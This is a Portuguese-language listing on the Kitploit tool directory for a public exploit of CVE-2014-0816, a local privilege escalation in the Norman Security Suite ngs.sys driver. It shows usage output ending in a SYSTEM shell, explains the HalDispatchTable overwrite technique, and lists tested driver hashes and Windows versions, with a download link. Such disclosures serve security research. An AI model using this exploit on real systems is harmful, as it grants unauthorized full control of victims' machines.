Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2014-0816 — CVE-2014-0816 | Kitploit
Ferramentas/GitHubGitHub/tandasat/cve-2014-0816
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Binários
GitHubtandasat/cve-2014-0816

CVE-2014-0816

CVE-2014-0816

Ver Repositório
2510há 9 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2014-0816

Este é um exploit para CVE-2014-0816 (JVNDB-2014-000026: Norman Security Suite vulnerável a escalada de privilégios).

Este exploit executa o CMD.exe com privilégio de SYSTEM a partir de um privilégio de Não-Administrador, explorando a vulnerabilidade em um manipulador de IOCTL do ngs.sys / ngs64.sys.

Uso

root@kitploit:~
C:\Users\user\Desktop> exploit_ngs.exe
[*] Exploit Norman General Security Driver (ngs.sys / ngs64.sys)
[*] Target file version: ver 5.0.740.0.
[*] An address file was created at C:\Users\user\Desktop\address.bin.
[*] Shellcode is located at 000000013F9357D0.
[*] The device was opened as 0000000000000044.
[*] The address file was opened as FFFFFFFF80000558.
[+] HalDispatchTable[1] is located at FFFFF800033FDC68.
[+] HalDispatchTable[1] was altered.
[+] Shellcode was executed.
[+] The SYSTEM shell was launched.
[*] Press any key to finish this program.

Em seguida, você verá um novo console.

root@kitploit:~
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\user\Desktop>whoami
nt authority\system

A vulnerabilidade permite que um atacante sobrescreva um endereço arbitrário com um valor arbitrário; portanto, este exploit altera o valor de HalDispatchTable[1] para um endereço de shellcode que eleva o privilégio do processo atual para privilégio de SYSTEM.

demo_win7_x64

Esta vulnerabilidade é explorável em todas as plataformas, do Windows XP ao 8, tanto em x86 quanto em x64; no entanto, este exploit foi projetado e testado em plataformas específicas (por exemplo, ele não funcionará no Windows 8 por causa do SMEP).

Plataformas Testadas

  • Norman Security Suite 10.1
  • 2ad60239e6637132fcaa816348c6ec3b358db49e (ngs.sys)
  • 21da5771db8308292c9d88a16b73260be40f0b09 (ngs.sys)
  • d2e34871d4d0fe04087e89f9c9f3599193b8258a (ngs64.sys)
  • fa1ed5997466263c8f91d8a4f3a80e3712cf777e (ngs64.sys)
  • Windows XP (x86) SP3 com privilégio de Convidado
  • Windows 7 (x86/x64) SP1 com privilégio de Convidado
  • Windows 10 (x64) Build 14393 com privilégio de Convidado (SMEP desativado)

Licença

Este software é distribuído sob a Licença MIT, consulte LICENSE.

Baixar ferramenta